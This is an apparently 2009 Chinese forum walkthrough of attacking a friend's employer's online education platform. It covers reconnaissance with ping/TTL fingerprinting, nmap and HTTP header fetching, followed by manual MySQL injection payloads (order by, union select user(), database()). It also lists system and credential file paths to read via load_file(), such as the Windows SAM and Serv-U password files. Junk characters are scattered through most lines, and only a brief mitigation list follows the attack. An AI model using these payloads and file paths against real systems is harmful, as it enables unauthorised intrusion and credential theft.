题记:' v2 m! K( |& B$ a( G
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
% W+ p( {! u' I6 A2 p第一步:获取需要的信息
* _: H# s1 k- P$ D. S; e由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
0 Q4 y: s+ ?% M( k4 R$ s8 Q2 u2 y注:以下为保护特用XXX代替敏感信息5 P) h, @2 q# U) s9 _/ @' X6 c5 _
顺手先PING了一下他们的域名:$ U% w: n( c: ?# U
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
2 X7 [ d4 |9 t, D( f/ x4 C64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms. _" C4 |3 w& N& P. u
顺便了解一下TTL,学好基础知识才能一路顺风:
- V4 i; {# g" `, m3 B) n% kTTL:(Time To Live ) 生存时间
; W8 e, k6 W ~! @指定数据包被路由器丢弃之前允许通过的网段数量。
8 p( x+ m. k8 m: t! QTTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
4 z6 X) y8 i: t) X* l使用PING时涉及到的 ICMP 报文类型
: H) _8 ] m1 \! _+ I, q0 z一个为ICMP请求回显(ICMP Echo Request)* x, n' k5 ]7 L
一个为ICMP回显应答(ICMP Echo Reply)/ _! T7 \( W; U
TTL 字段值可以帮助我们识别操作系统类型。
* R) r# u+ z% S4 l/ D9 a* EUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
3 b; k* H6 v2 `$ a8 UCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
0 J3 V+ }/ Q0 G$ B- }微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
2 D2 W; i1 M# m ` ?微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
! K( P& k% j7 Q当然,返回的TTL值是相同的
6 h' B9 ~& a$ H9 w( S3 @5 |但有些情况下有所特殊
% u8 s+ l7 l9 _7 P. |/ F5 a0 pLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 647 W+ |. z& Y* t7 Q+ p( u0 v
FreeBSD 4.1, 4.0, 3.4;8 \+ q& `, _, u3 r4 T0 G
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;3 B/ C" P6 x6 C* }
OpenBSD 2.6, 2.7,
( [/ @; s6 e6 z6 Y* E# `NetBSD1 |, N" U; A) q
HP UX 10.20
" U5 n$ H( m1 }$ n, d1 @+ U. uICMP 回显应答的 TTL 字段值为 255! E( r& n+ w9 G
Windows 95/98/98SE4 G/ }& f4 O/ ?# V& N- Z E; F7 d3 l
Windows ME# P$ Z: ]0 x" I( u9 D
ICMP 回显应答的 TTL 字段值为 323 r d- {. i& {# d; ^) w: m1 s/ \
Windows NT4 WRKS
2 i( ^# [0 U8 S) V* A2 RWindows NT4 Server2 G) q5 c0 H& _/ L! Q
Windows 2000% S0 X# B! y3 ?. f1 ~1 }8 j
Windows XP
! g- g' `+ H) P. @5 n( Q' x" OICMP 回显应答的 TTL 字段值为 128& H2 g# X; K2 x
这样,我们就可以通过这种方法来辨别操作系统
5 L* I1 K: {0 x* _TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的2556 O6 C) x) L8 J
用NMAP扫描一下:6 }+ d+ D- L/ h N ]9 P
nmap -sT -O XXX.XXX.XXX.XXX
* H6 `' d6 i' L如果没有装WinPcap则会弹出提示:/ |" U: l9 S+ K6 O6 Q
WARNING: Could not import all necessary WinPcap functions. You may need to upgr$ z" R5 J2 n5 D0 m* ?8 {/ Y( A
ade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect( Q0 n `7 y; [4 c: n0 \
) mode — Nmap may not function completely
. |- o8 U. G& {' R8 b: f0 JTCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher& k: T7 n) x0 o% I
and iphlpapi.dll be installed. You seem to be missing one or both of these. Win4 ]& T: r: ~4 S
pcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an
4 ]' A1 c) T. p4 r" n6 O, m+ Pd later operating sytems and NT 4.0 with SP4 or greater. For previous windows v
' U3 Y2 T2 M0 A |ersions, you may be able to take iphlpapi.dll from another system and place it i
+ X6 f* n! b, o6 e% _2 Z% D% X' F% En your system32 dir (e.g. c:\windows\system32).1 ?" \% G5 l7 s' ?
QUITTING!1 X3 G* D0 U" g, H0 N- `7 @; ` f
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
! [9 t: w- R; ]6 e3 z8 I+ q安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
5 P/ c3 i2 m. j# V5 hInteresting ports on XXX.XXX.XXX.XXX:
- H Z& H( t; H+ U) A+ f& D/ ?9 JNot shown: 986 closed ports# n2 [1 w M2 {7 m# h# J
PORT STATE SERVICE
, v' z& s" Z" X$ \21/tcp open ftp; O5 u L9 E1 @" }! I% o" |( u
22/tcp open ssh
5 X }- r1 ?5 Y4 S23/tcp open telnet4 Y! _0 K8 Q5 A8 h( E+ u
80/tcp open http
5 v1 K( m- a& I# e4 c111/tcp open rpcbind
8 b# e" W, k4 B: y! ?) I135/tcp filtered msrpc
' U: a z- `. ~2 m: |# n3 w1 ]139/tcp filtered netbios-ssn# K5 h$ P: i1 h2 u8 X; Z) G, \
445/tcp filtered microsoft-ds
# M: y# p4 ]. I8 F513/tcp open login
* @* e3 G D. l8 V3 p514/tcp open shell/ E* v) e F7 k* G* ~/ ]
593/tcp filtered http-rpc-epmap: c& g* ^5 N4 |9 y! a/ e3 H
1720/tcp filtered H.323/Q.9313 S# }) B0 ?$ A- u( B5 y
3306/tcp open mysql
: f, R( {' Y/ M4444/tcp filtered krb5247 f0 o6 y6 L* Q K( M
Device type: WAP
- [$ B# |" y' rRunning: Linux 2.4.X4 @( ^: K2 ]3 c5 N9 J. m* K2 P
OS details: DD-WRT (Linux 2.4.35s). s2 @& a& O1 j! h* I8 y- z( t
Network Distance: 13 hops
, _/ I" W9 j& L看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:1 b4 [/ }1 W- B5 E- l. ^
login as:+ P: u1 H# I, j
Telnet23端口也是开着的,用telnet 命令链接一下:
5 ?% C# u1 K% y- X- f) ztelnet XXX.XXX.XXX.XXX1 ?2 A! P- v+ K! B+ ?* A
提示:' v& e0 |0 g8 t, v
Red Hat Enterprise Linux Server release 5.2 (Tikanga)% ^ A. x3 Y0 K8 `. I; S4 ?2 n1 T
Kernel 2.6.18-92.el5PAE on an i686
0 d" q2 i% X+ p4 ~- b/ Elogin:- y1 j2 T( ~7 X4 N1 E
获取HTTP头信息:
& O- E' ^! ?) m" b3 x! w" F在本地执行如下PHP代码* D; d" E6 v: g6 o ?# M8 N
<?php0 t1 | p$ x+ g. t
$url = ‘XXX.XXX.XXX.XXX’;: v* Z/ R) i, E
print_r(get_headers($url));/ t. @) s) Z4 j! {$ U
print_r(get_headers($url, 1));
, M5 `/ B+ ]' X' _$ ], R?>
* L- o. }. S3 r0 [" U5 t) s将以上代码保存为PHP文件,执行:) U9 T: @" b+ k, @& F/ t
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
+ R3 ]; t4 A& g6 p2 |现在可以得出结论:
& V8 g( q7 z) N4 u4 t系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
! ~" _5 O8 H9 n: ?! i! f% }& e内核版本:Kernel 2.6.18-92.el5PAE on an i686
8 C: ~6 @# A" M* a3 TWEB服务器版本:nginx/0.7.61
) U7 Z# P# B4 G# p8 H第二步,开始测试寻找漏洞
3 `7 u+ Z6 w: ^; v3 C4 \分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
" q9 p! \: d+ u2 u- J; C# L1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
+ b1 Q$ `6 |' H1 R9 [8 L9 O2、测试方法:在地址后加 and 1=1 和 and 1=2 测试' f7 f( B0 G& X( {8 u8 y8 F2 x
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
! D( j# M c& G4 @& phttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误7 ~& h' p8 [4 A2 g
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续; `# C7 C$ r* ]
3、手工注入:9 J$ e& S% V2 \) n" {, ?
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。4 b# f6 ]- P- [# c- i2 S2 T
3.1 猜测当前表字段数- ]1 ^) e& H, w. x* l
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
' P% r2 i: \! i r此处猜测有个简单的算法,都是有技巧的吗,呵呵
- Z6 V7 t1 J& ~: t: Y' i算法简单如下:5 o8 q M6 M8 t3 ~/ ?3 f
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
& h/ ~4 ]+ A& _( L5 q8 N第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;6 S5 f; X' I0 Q! F
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
1 I& e7 d! i2 }! z6 ?8 f7 I以此来判断,是否过界,配合取中算法猜出字段数。2 i/ H7 F' ^! ]$ i" z
举例:5 w" X% W& X% j
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
) `( t* c& j/ chttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
$ o, z! P+ T& P6 E0 _" B此时3则为我们要找的字段数。
. _ g. f) |4 x* R3.2 配合union联合查询字段在页面所位置+ ]5 d! R# T" N" e
我们已经知道了字段数为3,此时则可以做如下操作:# E, j" i) t* h& b
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
/ H. D5 n( b8 n2 U7 T# s. ^
J5 o" R; P/ T4 \) d% p. j这样就可以测试到哪些字段在页面上有所显示了,如图:
$ T! ?0 E1 ~+ x: _- d
0 Q' y: u/ o: I5 n/ l; W2 l3.3 查敏感信息1 l3 J6 `, o7 _. ?9 c: b1 H7 Z
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
5 J+ L% Z Q# @1 ghttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
, C1 o8 R' T; M; F9 P* `3.3.1 先查数据库用户、数据库名,以备后用,如图:& _" B9 \7 x6 ^. n, b% V
9 P. D0 z3 B" G2 y9 m7 V: m得到数据库用户为root、数据库名为DBxx;
( v1 s+ r% }/ n+ i3.3.2 查配置文件: v. o# N/ \6 y3 K% m- m5 Q5 `2 ]/ h
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
E6 j5 J. T6 ^2 W- P7 t. H. V查看文件有一定的条件限制:
7 N$ `4 t; W' s; W欲读取文件必须在服务器上. r8 ]' V# ~9 `/ V
必须指定文件完整的路径( K) R* Z( T8 E1 z
必须有权限读取并且文件必须完全可读0 M. F2 B" f, |) S
欲读取文件必须小于 max_allowed_packet! o: _5 T% m2 O1 `" j! v) Z/ B6 ?
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。! J8 U, f n4 l% }, c4 n7 C+ R
常用的一些:
h( F: o; l5 y/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
& W$ |4 ]0 j6 K! [( K v/usr/local/apache2/conf/httpd.conf5 e8 w/ a2 ]$ {, F) r4 V
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
2 B# }' X3 i3 ^$ e- a) |/usr/local/app/php5/lib/php.ini //PHP相关设置$ e1 _, O( N4 V
/etc/sysconfig/iptables //从中得到防火墙规则策略
+ s6 k1 @: u; t0 W/etc/httpd/conf/httpd.conf // apache配置文件) I7 f% M' H8 D+ |/ m$ j, [
/etc/rsyncd.conf //同步程序配置文件8 M2 f7 s% u; t) N- \
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.( e. b! J9 u9 H! ^& y- V
/etc/my.cnf //mysql的配置文件* W1 Q3 z0 T* n B" x9 H& e
/etc/redhat-release //系统版本0 l( S' {; _! l; ~, h
/etc/issue
$ C8 T) e( f# m% I0 }/etc/issue.net$ O6 m* ~; f! z0 \
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码* h- i3 R$ c* U u+ v% o
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
! X& j: i7 Y: p6 ~0 s/ Oc:\Program Files\Serv-U\ServUDaemon.ini
3 u: P. y3 L4 k+ B) r0 m$ `- dc:\windows\my.ini //MYSQL配置文件
, s% ]" a+ N% h) E1 Qc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件' G+ G0 m3 C& F, _
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
, {' s8 s# D0 ^6 B E8 Vc:\windows\repair\sam //存储了WINDOWS系统初次安装的密码( H" j- X# Q6 H7 \' ~9 ]# V [
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
' \' r. M) F' \' n/ lc:\Program Files\RhinoSoft.com\ServUDaemon.exe
, [, T3 x) ^0 H% E4 RC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件9 U7 y6 W7 c+ R0 I$ g* Y% J( ^" D# y
//存储了pcAnywhere的登陆密码
7 ]; i) u$ \* j# a! e" Q' p由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
/ v7 S$ d6 G$ O2 q! W: f; c这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
' k7 E% \7 l4 E# K0 J4 c6 D最后:防范措施
6 s. O6 |3 \3 U7 z1、修复PHP注入漏洞;# G5 j. G( J7 ?, K$ A3 T$ F& M0 `
2、Mysql使用普通权限的用户;/ L, }' e" b# ]3 b! D% h
3、升级linux内核至最新版本; |